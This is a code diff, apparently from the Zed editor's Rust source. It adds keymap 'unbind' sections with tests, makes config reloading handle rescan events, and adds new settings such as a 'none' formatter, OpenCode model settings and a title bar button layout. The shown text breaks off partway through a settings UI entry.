- let (index, _) = find_binding(&keymap, &from, &action_value, keyboard_mapper)?;
- Some(keymap.0[index].use_key_equivalents)
+ let binding_location =
+ find_binding(&keymap, &from, &action_value, keyboard_mapper)?;
+ Some(keymap.0[binding_location.index].use_key_equivalents)
}).unwrap_or(false);
if use_key_equivalents {
value.insert("use_key_equivalents".to_string(), true.into());
@@ -886,6 +1057,28 @@ impl KeymapFile {
);
keymap_contents.replace_range(replace_range, &replace_value);
}
+
+ if let Some(suppression_unbind) = suppression_unbind {
+ let mut value = serde_json::Map::with_capacity(2);
+ if let Some(context) = suppression_unbind.context {
+ value.insert("context".to_string(), context.into());
+ }
+ value.insert("unbind".to_string(), {
+ let mut unbind = serde_json::Map::new();
+ unbind.insert(
+ suppression_unbind.keystrokes_unparsed(),
+ suppression_unbind.action_value()?,
+ );
+ unbind.into()
+ });
+ let (replace_range, replace_value) = append_top_level_array_value_in_json_text(
+ &keymap_contents,
+ &value.into(),
+ tab_size,
+ );
+ keymap_contents.replace_range(replace_range, &replace_value);
+ }
+
return Ok(keymap_contents);
fn find_binding<'a, 'b>(
@@ -893,7 +1086,7 @@ impl KeymapFile {
target: &KeybindUpdateTarget<'a>,
target_action_value: &Value,
keyboard_mapper: &dyn gpui::PlatformKeyboardMapper,
- ) -> Option<(usize, &'b str)> {
+ ) -> Option<BindingLocation<'b>> {
let target_context_parsed =
KeyBindingContextPredicate::parse(target.context.unwrap_or("")).ok();
for (index, section) in keymap.sections().enumerate() {
@@ -902,40 +1095,108 @@ impl KeymapFile {
if section_context_parsed != target_context_parsed {
continue;
}
- let Some(bindings) = &section.bindings else {
+
+ if let Some(binding_location) = find_binding_in_entries(
+ section.bindings.as_ref(),
+ BindingKind::Binding,
+ index,
+ target,
+ target_action_value,
+ keyboard_mapper,
+ |action| &action.0,
+ ) {
+ return Some(binding_location);
+ }
+
+ if let Some(binding_location) = find_binding_in_entries(
+ section.unbind.as_ref(),
+ BindingKind::Unbind,
+ index,
+ target,
+ target_action_value,
+ keyboard_mapper,
+ |action| &action.0,
+ ) {
+ return Some(binding_location);
+ }
+ }
+ None
+ }
+
+ fn find_binding_in_entries<'a, 'b, T>(
+ entries: Option<&'b IndexMap<String, T>>,
+ kind: BindingKind,
+ index: usize,
+ target: &KeybindUpdateTarget<'a>,
+ target_action_value: &Value,
+ keyboard_mapper: &dyn gpui::PlatformKeyboardMapper,
+ action_value: impl Fn(&T) -> &Value,
+ ) -> Option<BindingLocation<'b>> {
+ let entries = entries?;
+ for (keystrokes_str, action) in entries {
+ let Ok(keystrokes) = keystrokes_str
+ .split_whitespace()
+ .map(|source| {
+ let keystroke = Keystroke::parse(source)?;
+ Ok(KeybindingKeystroke::new_with_mapper(
+ keystroke,
+ false,
+ keyboard_mapper,
+ ))
+ })
+ .collect::<Result<Vec<_>, InvalidKeystrokeError>>()
+ else {
continue;
};
- for (keystrokes_str, action) in bindings {
- let Ok(keystrokes) = keystrokes_str
- .split_whitespace()
- .map(|source| {
- let keystroke = Keystroke::parse(source)?;
- Ok(KeybindingKeystroke::new_with_mapper(
- keystroke,
- false,
- keyboard_mapper,
- ))
- })
- .collect::<Result<Vec<_>, InvalidKeystrokeError>>()
- else {
- continue;
- };
- if keystrokes.len() != target.keystrokes.len()
- || !keystrokes
- .iter()
- .zip(target.keystrokes)
- .all(|(a, b)| a.inner().should_match(b))
- {
- continue;
- }
- if &action.0 != target_action_value {
- continue;
- }
- return Some((index, keystrokes_str));
+ if keystrokes.len() != target.keystrokes.len()
+ || !keystrokes
+ .iter()
+ .zip(target.keystrokes)
+ .all(|(a, b)| a.inner().should_match(b))
+ {
+ continue;
}
+ if action_value(action) != target_action_value {
+ continue;
+ }
+ return Some(BindingLocation {
+ index,
+ kind,
+ keystrokes_str,
+ });
}
None
}
+
+ #[derive(Copy, Clone)]
+ enum BindingKind {
+ Binding,
+ Unbind,
+ }
+
+ impl BindingKind {
+ fn key_path(self) -> &'static str {
+ match self {
+ Self::Binding => "bindings",
+ Self::Unbind => "unbind",
+ }
+ }
+ }
+
+ struct BindingLocation<'a> {
+ index: usize,
+ kind: BindingKind,
+ keystrokes_str: &'a str,
+ }
+
+ impl BindingLocation<'_> {
+ fn is_only_entry_in_section(&self, keymap: &KeymapFile) -> bool {
+ let section = &keymap.0[self.index];
+ let binding_count = section.bindings.as_ref().map_or(0, IndexMap::len);
+ let unbind_count = section.unbind.as_ref().map_or(0, IndexMap::len);
+ binding_count + unbind_count == 1
+ }
+ }
}
}
@@ -1228,7 +1489,8 @@ impl Action for ActionSequence {
#[cfg(test)]
mod tests {
- use gpui::{DummyKeyboardMapper, KeybindingKeystroke, Keystroke};
+ use gpui::{Action, App, DummyKeyboardMapper, KeybindingKeystroke, Keystroke, Unbind};
+ use serde_json::Value;
use unindent::Unindent;
use crate::{
@@ -1236,6 +1498,8 @@ mod tests {
keymap_file::{KeybindUpdateOperation, KeybindUpdateTarget},
};
+ gpui::actions!(test_keymap_file, [StringAction, InputAction]);
+
#[test]
fn can_deserialize_keymap_with_trailing_comma() {
let json = indoc::indoc! {"[
@@ -1251,6 +1515,191 @@ mod tests {
KeymapFile::parse(json).unwrap();
}
+ #[gpui::test]
+ fn keymap_section_unbinds_are_loaded_before_bindings(cx: &mut App) {
+ let key_bindings = match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": "test_keymap_file::StringAction",
+ "ctrl-b": ["test_keymap_file::InputAction", {}]
+ },
+ "bindings": {
+ "ctrl-c": "test_keymap_file::StringAction"
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings,
+ crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad {
+ error_message, ..
+ } => {
+ panic!("{error_message}");
+ }
+ crate::keymap_file::KeymapFileLoadResult::JsonParseFailure { error } => {
+ panic!("JSON parse error: {error}");
+ }
+ };
+
+ assert_eq!(key_bindings.len(), 3);
+ assert!(
+ key_bindings[0]
+ .action()
+ .partial_eq(&Unbind("test_keymap_file::StringAction".into()))
+ );
+ assert_eq!(key_bindings[0].action_input(), None);
+ assert!(
+ key_bindings[1]
+ .action()
+ .partial_eq(&Unbind("test_keymap_file::InputAction".into()))
+ );
+ assert_eq!(
+ key_bindings[1]
+ .action_input()
+ .as_ref()
+ .map(ToString::to_string),
+ Some("{}".to_string())
+ );
+ assert_eq!(
+ key_bindings[2].action().name(),
+ "test_keymap_file::StringAction"
+ );
+ }
+
+ #[gpui::test]
+ fn keymap_unbind_loads_valid_target_action_with_input(cx: &mut App) {
+ let key_bindings = match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": ["test_keymap_file::InputAction", {}]
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::Success { key_bindings } => key_bindings,
+ other => panic!("expected Success, got {other:?}"),
+ };
+
+ assert_eq!(key_bindings.len(), 1);
+ assert!(
+ key_bindings[0]
+ .action()
+ .partial_eq(&Unbind("test_keymap_file::InputAction".into()))
+ );
+ assert_eq!(
+ key_bindings[0]
+ .action_input()
+ .as_ref()
+ .map(ToString::to_string),
+ Some("{}".to_string())
+ );
+ }
+
+ #[gpui::test]
+ fn keymap_unbind_rejects_null(cx: &mut App) {
+ match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": null
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad {
+ key_bindings,
+ error_message,
+ } => {
+ assert!(key_bindings.is_empty());
+ assert!(
+ error_message
+ .0
+ .contains("expected action name string or [name, input] array.")
+ );
+ }
+ other => panic!("expected SomeFailedToLoad, got {other:?}"),
+ }
+ }
+
+ #[gpui::test]
+ fn keymap_unbind_rejects_unbind_action(cx: &mut App) {
+ match KeymapFile::load(
+ indoc::indoc! {r#"
+ [
+ {
+ "unbind": {
+ "ctrl-a": ["zed::Unbind", "test_keymap_file::StringAction"]
+ }
+ }
+ ]
+ "#},
+ cx,
+ ) {
+ crate::keymap_file::KeymapFileLoadResult::SomeFailedToLoad {
+ key_bindings,
+ error_message,
+ } => {
+ assert!(key_bindings.is_empty());
+ assert!(
+ error_message
+ .0
+ .contains("can't use `\"zed::Unbind\"` as an unbind target.")
+ );
+ }
+ other => panic!("expected SomeFailedToLoad, got {other:?}"),
+ }
+ }
+
+ #[test]
+ fn keymap_schema_for_unbind_excludes_null_and_unbind_action() {
+ fn schema_allows(schema: &Value, expected: &Value) -> bool {
+ match schema {
+ Value::Object(object) => {
+ if object.get("const") == Some(expected) {
+ return true;
+ }
+ if object.get("type") == Some(&Value::String("null".to_string()))
+ && expected == &Value::Null
+ {
+ return true;
+ }
+ object.values().any(|value| schema_allows(value, expected))
+ }
+ Value::Array(items) => items.iter().any(|value| schema_allows(value, expected)),
+ _ => false,
+ }
+ }
+
+ let schema = KeymapFile::generate_json_schema_from_inventory();
+ let unbind_schema = schema
+ .pointer("/$defs/UnbindTargetAction")
+ .expect("missing UnbindTargetAction schema");
+
+ assert!(!schema_allows(unbind_schema, &Value::Null));
+ assert!(!schema_allows(
+ unbind_schema,
+ &Value::String(Unbind::name_for_type().to_string())
+ ));
+ assert!(schema_allows(
+ unbind_schema,
+ &Value::String("test_keymap_file::StringAction".to_string())
+ ));
+ assert!(schema_allows(
+ unbind_schema,
+ &Value::String("test_keymap_file::InputAction".to_string())
+ ));
+ }
+
#[track_caller]
fn check_keymap_update(
input: impl ToString,
@@ -1479,6 +1928,102 @@ mod tests {
}
]
}
+ },
+ {
+ "unbind": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ );
+
+ // Replacing a non-user binding without changing the keystroke should
+ // not produce an unbind suppression entry.
+ check_keymap_update(
+ r#"[
+ {
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ KeybindUpdateOperation::Replace {
+ target: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-a"),
+ action_name: "zed::SomeAction",
+ context: None,
+ action_arguments: None,
+ },
+ source: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-a"),
+ action_name: "zed::SomeOtherAction",
+ context: None,
+ action_arguments: None,
+ },
+ target_keybind_source: KeybindSource::Base,
+ },
+ r#"[
+ {
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ },
+ {
+ "bindings": {
+ "ctrl-a": "zed::SomeOtherAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ );
+
+ // Replacing a non-user binding with a context and a keystroke change
+ // should produce a suppression entry that preserves the context.
+ check_keymap_update(
+ r#"[
+ {
+ "context": "SomeContext",
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ }
+ ]"#
+ .unindent(),
+ KeybindUpdateOperation::Replace {
+ target: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-a"),
+ action_name: "zed::SomeAction",
+ context: Some("SomeContext"),
+ action_arguments: None,
+ },
+ source: KeybindUpdateTarget {
+ keystrokes: &parse_keystrokes("ctrl-b"),
+ action_name: "zed::SomeOtherAction",
+ context: Some("SomeContext"),
+ action_arguments: None,
+ },
+ target_keybind_source: KeybindSource::Default,
+ },
+ r#"[
+ {
+ "context": "SomeContext",
+ "bindings": {
+ "ctrl-a": "zed::SomeAction"
+ }
+ },
+ {
+ "context": "SomeContext",
+ "bindings": {
+ "ctrl-b": "zed::SomeOtherAction"
+ }
+ },
+ {
+ "context": "SomeContext",
+ "unbind": {
+ "ctrl-a": "zed::SomeAction"
+ }
}
]"#
.unindent(),
@@ -5,6 +5,61 @@ use futures::{StreamExt, channel::mpsc};
use gpui::{App, BackgroundExecutor, ReadGlobal};
use std::{path::PathBuf, sync::Arc, time::Duration};
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use fs::FakeFs;
+
+ use gpui::TestAppContext;
+ use serde_json::json;
+ use std::path::Path;
+
+ #[gpui::test]
+ async fn test_watch_config_dir_reloads_tracked_file_on_rescan(cx: &mut TestAppContext) {
+ cx.executor().allow_parking();
+
+ let fs = FakeFs::new(cx.background_executor.clone());
+ let config_dir = PathBuf::from("/root/config");
+ let settings_path = PathBuf::from("/root/config/settings.json");
+
+ fs.insert_tree(
+ Path::new("/root"),
+ json!({
+ "config": {
+ "settings.json": "A"
+ }
+ }),
+ )
+ .await;
+
+ let mut rx = watch_config_dir(
+ &cx.background_executor,
+ fs.clone(),
+ config_dir.clone(),
+ HashSet::from_iter([settings_path.clone()]),
+ );
+
+ assert_eq!(rx.next().await.as_deref(), Some("A"));
+ cx.run_until_parked();
+
+ fs.pause_events();
+ fs.insert_file(&settings_path, b"B".to_vec()).await;
+ fs.clear_buffered_events();
+
+ fs.emit_fs_event(&settings_path, Some(PathEventKind::Rescan));
+ fs.unpause_events_and_flush();
+ assert_eq!(rx.next().await.as_deref(), Some("B"));
+
+ fs.pause_events();
+ fs.insert_file(&settings_path, b"A".to_vec()).await;
+ fs.clear_buffered_events();
+
+ fs.emit_fs_event(&config_dir, Some(PathEventKind::Rescan));
+ fs.unpause_events_and_flush();
+ assert_eq!(rx.next().await.as_deref(), Some("A"));
+ }
+}
+
pub const EMPTY_THEME_NAME: &str = "empty-theme";
/// Settings for visual tests that use proper fonts instead of Courier.
@@ -139,8 +194,25 @@ pub fn watch_config_dir(
return;
}
}
+ Some(PathEventKind::Rescan) => {
+ for file_path in &config_paths {
+ let contents = fs.load(file_path).await.unwrap_or_default();
+ if tx.unbounded_send(contents).is_err() {
+ return;
+ }
+ }
+ }
_ => {}
}
+ } else if matches!(event.kind, Some(PathEventKind::Rescan))
+ && event.path == dir_path
+ {
+ for file_path in &config_paths {
+ let contents = fs.load(file_path).await.unwrap_or_default();
+ if tx.unbounded_send(contents).is_err() {
+ return;
+ }
+ }
}
}
}
@@ -793,6 +793,17 @@ impl SettingsStore {
edits
}
+ /// Mutates the default settings in place and recomputes all setting values.
+ pub fn update_default_settings(
+ &mut self,
+ cx: &mut App,
+ update: impl FnOnce(&mut SettingsContent),
+ ) {
+ let default_settings = Rc::make_mut(&mut self.default_settings);
+ update(default_settings);
+ self.recompute_values(None, cx);
+ }
+
/// Sets the default settings via a JSON string.
///
/// The string should contain a JSON object with a default value for every setting.
@@ -793,7 +793,12 @@ impl VsCodeSettings {
hide_root: None,
indent_guides: None,
indent_size: None,
- scrollbar: None,
+ scrollbar: self.read_bool("workbench.list.horizontalScrolling").map(
+ |horizontal_scrolling| ProjectPanelScrollbarSettingsContent {
+ show: None,
+ horizontal_scroll: Some(horizontal_scrolling),
+ },
+ ),
show_diagnostics: self
.read_bool("problems.decorations.enabled")
.and_then(|b| if b { Some(ShowDiagnostics::Off) } else { None }),
@@ -872,6 +877,7 @@ impl VsCodeSettings {
scrollbar: None,
scroll_multiplier: None,
toolbar: None,
+ show_count_badge: None,
})
}
@@ -9,6 +9,30 @@ use crate::ExtendingVec;
use crate::DockPosition;
+/// Where new threads should start by default.
+#[derive(
+ Clone,
+ Copy,
+ Debug,
+ Default,
+ PartialEq,
+ Eq,
+ Serialize,
+ Deserialize,
+ JsonSchema,
+ MergeFrom,
+ strum::VariantArray,
+ strum::VariantNames,
+)]
+#[serde(rename_all = "snake_case")]
+pub enum NewThreadLocation {
+ /// Start threads in the current project.
+ #[default]
+ LocalProject,
+ /// Start threads in a new worktree.
+ NewWorktree,
+}
+
#[with_fallible_options]
#[derive(Clone, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom, Debug, Default)]
pub struct AgentSettingsContent {
@@ -59,6 +83,10 @@ pub struct AgentSettingsContent {
///
/// Default: "thread"
pub default_view: Option<DefaultAgentView>,
+ /// Where new threads should start by default.
+ ///
+ /// Default: "local_project"
+ pub new_thread_location: Option<NewThreadLocation>,
/// The available agent profiles.
pub profiles: Option<IndexMap<Arc<str>, AgentProfileContent>>,
/// Where to show a popup notification when the agent is waiting for user input.
@@ -146,6 +174,10 @@ impl AgentSettingsContent {
self.default_profile = Some(profile_id);
}
+ pub fn set_new_thread_location(&mut self, value: NewThreadLocation) {
+ self.new_thread_location = Some(value);
+ }
+
pub fn add_favorite_model(&mut self, model: LanguageModelSelection) {
if !self.favorite_models.contains(&model) {
self.favorite_models.push(model);
@@ -955,6 +955,8 @@ pub enum Formatter {
/// or falling back to formatting via language server.
#[default]
Auto,
+ /// Do not format code.
+ None,
/// Format code using Zed's Prettier integration.
Prettier,
/// Format code using an external command.
@@ -1148,6 +1150,12 @@ mod test {
settings.formatter,
Some(FormatterList::Single(Formatter::Auto))
);
+ let raw_none = "{\"formatter\": \"none\"}";
+ let settings: LanguageSettingsContent = serde_json::from_str(raw_none).unwrap();
+ assert_eq!(
+ settings.formatter,
+ Some(FormatterList::Single(Formatter::None))
+ );
let raw = "{\"formatter\": \"language_server\"}";
let settings: LanguageSettingsContent = serde_json::from_str(raw).unwrap();
assert_eq!(
@@ -16,6 +16,7 @@ pub struct AllLanguageModelSettingsContent {
pub lmstudio: Option<LmStudioSettingsContent>,
pub mistral: Option<MistralSettingsContent>,
pub ollama: Option<OllamaSettingsContent>,
+ pub opencode: Option<OpenCodeSettingsContent>,
pub open_router: Option<OpenRouterSettingsContent>,
pub openai: Option<OpenAiSettingsContent>,
pub openai_compatible: Option<HashMap<Arc<str>, OpenAiCompatibleSettingsContent>>,
@@ -144,6 +145,24 @@ impl Default for KeepAlive {
}
}
+#[with_fallible_options]
+#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)]
+pub struct OpenCodeSettingsContent {
+ pub api_url: Option<String>,
+ pub available_models: Option<Vec<OpenCodeAvailableModel>>,
+}
+
+#[with_fallible_options]
+#[derive(Clone, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)]
+pub struct OpenCodeAvailableModel {
+ pub name: String,
+ pub display_name: Option<String>,
+ pub max_tokens: u64,
+ pub max_output_tokens: Option<u64>,
+ /// The API protocol to use for this model: "anthropic", "openai_responses", "openai_chat", or "google".
+ pub protocol: String,
+}
+
#[with_fallible_options]
#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)]
pub struct LmStudioSettingsContent {
@@ -9,6 +9,7 @@ mod project;
mod serde_helper;
mod terminal;
mod theme;
+mod title_bar;
mod workspace;
pub use agent::*;
@@ -26,6 +27,7 @@ pub use serde_helper::{
use settings_json::parse_json_with_comments;
pub use terminal::*;
pub use theme::*;
+pub use title_bar::*;
pub use workspace::*;
use collections::{HashMap, IndexMap};
@@ -316,54 +318,10 @@ impl strum::VariantNames for BaseKeymapContent {
];
}
-#[with_fallible_options]
-#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)]
-pub struct TitleBarSettingsContent {
- /// Whether to show the branch icon beside branch switcher in the title bar.
- ///
- /// Default: false
- pub show_branch_icon: Option<bool>,
- /// Whether to show onboarding banners in the title bar.
- ///
- /// Default: true
- pub show_onboarding_banner: Option<bool>,
- /// Whether to show user avatar in the title bar.
- ///
- /// Default: true
- pub show_user_picture: Option<bool>,
- /// Whether to show the branch name button in the titlebar.
- ///
- /// Default: true
- pub show_branch_name: Option<bool>,
- /// Whether to show the project host and name in the titlebar.
- ///
- /// Default: true
- pub show_project_items: Option<bool>,
- /// Whether to show the sign in button in the title bar.
- ///
- /// Default: true
- pub show_sign_in: Option<bool>,
- /// Whether to show the user menu button in the title bar.
- ///
- /// Default: true
- pub show_user_menu: Option<bool>,
- /// Whether to show the menus in the title bar.
- ///
- /// Default: false
- pub show_menus: Option<bool>,
-}
-
/// Configuration of audio in Zed.
#[with_fallible_options]
#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)]
pub struct AudioSettingsContent {
- /// Opt into the new audio system.
- ///
- /// You need to rejoin a call for this setting to apply
- #[serde(rename = "experimental.rodio_audio")]
- pub rodio_audio: Option<bool>, // default is false
- /// Requires 'rodio_audio: true'
- ///
/// Automatically increase or decrease you microphone's volume. This affects how
/// loud you sound to others.
///
@@ -373,35 +331,11 @@ pub struct AudioSettingsContent {
/// compared to other speakers.
#[serde(rename = "experimental.auto_microphone_volume")]
pub auto_microphone_volume: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
- /// Automatically increate or decrease the volume of other call members.
- /// This only affects how things sound for you.
- #[serde(rename = "experimental.auto_speaker_volume")]
- pub auto_speaker_volume: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
/// Remove background noises. Works great for typing, cars, dogs, AC. Does
/// not work well on music.
- #[serde(rename = "experimental.denoise")]
- pub denoise: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
- /// Use audio parameters compatible with the previous versions of
- /// experimental audio and non-experimental audio. When this is false you
- /// will sound strange to anyone not on the latest experimental audio. In
- /// the future we will migrate by setting this to false
- ///
- /// You need to rejoin a call for this setting to apply
- #[serde(rename = "experimental.legacy_audio_compatible")]
- pub legacy_audio_compatible: Option<bool>,
- /// Requires 'rodio_audio: true'
- ///
/// Select specific output audio device.
#[serde(rename = "experimental.output_audio_device")]
pub output_audio_device: Option<AudioOutputDeviceName>,
- /// Requires 'rodio_audio: true'
- ///
/// Select specific input audio device.
#[serde(rename = "experimental.input_audio_device")]
pub input_audio_device: Option<AudioInputDeviceName>,
@@ -593,6 +527,17 @@ pub struct GitPanelSettingsContent {
///
/// Default: icon
pub status_style: Option<StatusStyle>,
+
+ /// Whether to show file icons in the git panel.
+ ///
+ /// Default: false
+ pub file_icons: Option<bool>,
+
+ /// Whether to show folder icons or chevrons for directories in the git panel.
+ ///
+ /// Default: true
+ pub folder_icons: Option<bool>,
+
/// How and when the scrollbar should be displayed.
///
/// Default: inherits editor scrollbar settings
@@ -622,8 +567,18 @@ pub struct GitPanelSettingsContent {
/// Whether to show the addition/deletion change count next to each file in the Git panel.
///
- /// Default: false
+ /// Default: true
pub diff_stats: Option<bool>,
+
+ /// Whether to show a badge on the git panel icon with the count of uncommitted changes.
+ ///
+ /// Default: false
+ pub show_count_badge: Option<bool>,
+
+ /// Whether the git panel should open on startup.
+ ///
+ /// Default: false
+ pub starts_open: Option<bool>,
}
#[derive(
@@ -671,6 +626,10 @@ pub struct NotificationPanelSettingsContent {
/// Default: 300
#[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")]
pub default_width: Option<f32>,
+ /// Whether to show a badge on the notification panel icon with the count of unread notifications.
+ ///
+ /// Default: false
+ pub show_count_badge: Option<bool>,
}
#[with_fallible_options]
@@ -721,6 +680,10 @@ pub struct FileFinderSettingsContent {
///
/// Default: Smart
pub include_ignored: Option<IncludeIgnoredContent>,
+ /// Whether to include text channels in file finder results.
+ ///
+ /// Default: false
+ pub include_channels: Option<bool>,
}
#[derive(
@@ -171,6 +171,10 @@ pub struct TerminalSettingsContent {
/// Default: 45
#[serde(serialize_with = "crate::serialize_optional_f32_with_two_decimal_places")]
pub minimum_contrast: Option<f32>,
+ /// Whether to show a badge on the terminal panel icon with the count of open terminals.
+ ///
+ /// Default: false
+ pub show_count_badge: Option<bool>,
}
/// Shell configuration to open the terminal with.
@@ -0,0 +1,124 @@
+use gpui::WindowButtonLayout;
+use schemars::{JsonSchema, Schema, SchemaGenerator, json_schema};
+use serde::{Deserialize, Serialize};
+use settings_macros::{MergeFrom, with_fallible_options};
+
+/// The layout of window control buttons as represented by user settings.
+///
+/// Custom layout strings use the GNOME `button-layout` format (e.g.
+/// `"close:minimize,maximize"`).
+#[derive(
+ Clone,
+ PartialEq,
+ Debug,
+ Serialize,
+ Deserialize,
+ JsonSchema,
+ MergeFrom,
+ Default,
+ strum::EnumDiscriminants,
+)]
+#[strum_discriminants(derive(strum::VariantArray, strum::VariantNames, strum::FromRepr))]
+#[schemars(schema_with = "window_button_layout_schema")]
+#[serde(from = "String", into = "String")]
+pub enum WindowButtonLayoutContent {
+ /// Follow the system/desktop configuration.
+ #[default]
+ PlatformDefault,
+ /// Use Zed's built-in standard layout, regardless of system config.
+ Standard,
+ /// A raw GNOME-style layout string.
+ Custom(String),
+}
+
+impl WindowButtonLayoutContent {
+ #[cfg(any(target_os = "linux", target_os = "freebsd"))]
+ pub fn into_layout(self) -> Option<WindowButtonLayout> {
+ use util::ResultExt;
+
+ match self {
+ Self::PlatformDefault => None,
+ Self::Standard => Some(WindowButtonLayout::linux_default()),
+ Self::Custom(layout) => WindowButtonLayout::parse(&layout).log_err(),
+ }
+ }
+
+ #[cfg(not(any(target_os = "linux", target_os = "freebsd")))]
+ pub fn into_layout(self) -> Option<WindowButtonLayout> {
+ None
+ }
+}
+
+fn window_button_layout_schema(_: &mut SchemaGenerator) -> Schema {
+ json_schema!({
+ "anyOf": [
+ { "enum": ["platform_default", "standard"] },
+ { "type": "string" }
+ ]
+ })
+}
+
+impl From<WindowButtonLayoutContent> for String {
+ fn from(value: WindowButtonLayoutContent) -> Self {
+ match value {
+ WindowButtonLayoutContent::PlatformDefault => "platform_default".to_string(),
+ WindowButtonLayoutContent::Standard => "standard".to_string(),
+ WindowButtonLayoutContent::Custom(s) => s,
+ }
+ }
+}
+
+impl From<String> for WindowButtonLayoutContent {
+ fn from(layout_string: String) -> Self {
+ match layout_string.as_str() {
+ "platform_default" => Self::PlatformDefault,
+ "standard" => Self::Standard,
+ _ => Self::Custom(layout_string),
+ }
+ }
+}
+
+#[with_fallible_options]
+#[derive(Clone, PartialEq, Default, Serialize, Deserialize, JsonSchema, MergeFrom, Debug)]
+pub struct TitleBarSettingsContent {
+ /// Whether to show the branch icon beside branch switcher in the title bar.
+ ///
+ /// Default: false
+ pub show_branch_icon: Option<bool>,
+ /// Whether to show onboarding banners in the title bar.
+ ///
+ /// Default: true
+ pub show_onboarding_banner: Option<bool>,
+ /// Whether to show user avatar in the title bar.
+ ///
+ /// Default: true
+ pub show_user_picture: Option<bool>,
+ /// Whether to show the branch name button in the titlebar.
+ ///
+ /// Default: true
+ pub show_branch_name: Option<bool>,
+ /// Whether to show the project host and name in the titlebar.
+ ///
+ /// Default: true
+ pub show_project_items: Option<bool>,
+ /// Whether to show the sign in button in the title bar.
+ ///
+ /// Default: true
+ pub show_sign_in: Option<bool>,
+ /// Whether to show the user menu button in the title bar.
+ ///
+ /// Default: true
+ pub show_user_menu: Option<bool>,
+ /// Whether to show the menus in the title bar.
+ ///
+ /// Default: false
+ pub show_menus: Option<bool>,
+ /// The layout of window control buttons in the title bar (Linux only).
+ ///
+ /// This can be set to "platform_default" to follow the system configuration, or
+ /// "standard" to use Zed's built-in layout. For custom layouts, use a
+ /// GNOME-style layout string like "close:minimize,maximize".
+ ///
+ /// Default: "platform_default"
+ pub button_layout: Option<WindowButtonLayoutContent>,
+}
@@ -6,8 +6,8 @@ use serde::{Deserialize, Serialize};
use settings_macros::{MergeFrom, with_fallible_options};
use crate::{
- CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity,
- ScrollbarSettingsContent, ShowIndentGuides, serialize_optional_f32_with_two_decimal_places,
+ CenteredPaddingSettings, DelayMs, DockPosition, DockSide, InactiveOpacity, ShowIndentGuides,
+ ShowScrollbar, serialize_optional_f32_with_two_decimal_places,
};
#[with_fallible_options]
@@ -710,7 +710,7 @@ pub struct ProjectPanelSettingsContent {
/// Default: true
pub starts_open: Option<bool>,
/// Scrollbar-related settings
- pub scrollbar: Option<ScrollbarSettingsContent>,
+ pub scrollbar: Option<ProjectPanelScrollbarSettingsContent>,
/// Which files containing diagnostic errors/warnings to mark in the project panel.
///
/// Default: all
@@ -793,6 +793,23 @@ pub enum ProjectPanelSortMode {
FilesFirst,
}
+#[with_fallible_options]
+#[derive(
+ Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default,
+)]
+pub struct ProjectPanelScrollbarSettingsContent {
+ /// When to show the scrollbar in the project panel.
+ ///
+ /// Default: inherits editor scrollbar settings
+ pub show: Option<ShowScrollbar>,
+ /// Whether to allow horizontal scrolling in the project panel.
+ /// When false, the view is locked to the leftmost position and
+ /// long file names are clipped.
+ ///
+ /// Default: true
+ pub horizontal_scroll: Option<bool>,
+}
+
#[with_fallible_options]
#[derive(
Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, MergeFrom, PartialEq, Eq, Default,
@@ -28,6 +28,7 @@ cpal.workspace = true
edit_prediction.workspace = true
edit_prediction_ui.workspace = true
editor.workspace = true
+feature_flags.workspace = true
fs.workspace = true
futures.workspace = true
fuzzy.workspace = true
@@ -1,3 +1,4 @@
+use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _};
use gpui::{Action as _, App};
use itertools::Itertools as _;
use settings::{
@@ -74,7 +75,7 @@ pub(crate) fn settings_data(cx: &App) -> Vec<SettingsPage> {
terminal_page(),
version_control_page(),
collaboration_page(),
- ai_page(),
+ ai_page(cx),
network_page(),
]
}
@@ -3480,7 +3481,7 @@ fn window_and_layout_page() -> SettingsPage {
]
}
- fn title_bar_section() -> [SettingsPageItem; 9] {
+ fn title_bar_section() -> [SettingsPageItem; 10] {
[
SettingsPageItem::SectionHeader("Title Bar"),
SettingsPageItem::SettingItem(SettingItem {
@@ -3647,6 +3648,122 @@ fn window_and_layout_page() -> SettingsPage {
metadata: None,
files: USER,
}),
+ SettingsPageItem::DynamicItem(DynamicItem {
+ discriminant: SettingItem {
+ files: USER,
+ title: "Button Layout",
+ description:
+ "(Linux only) choose how window control buttons are laid out in the titlebar.",
+ field: Box::new(SettingField {
+ json_path: Some("title_bar.button_layout$"),
+ pick: |settings_content| {
+ Some(
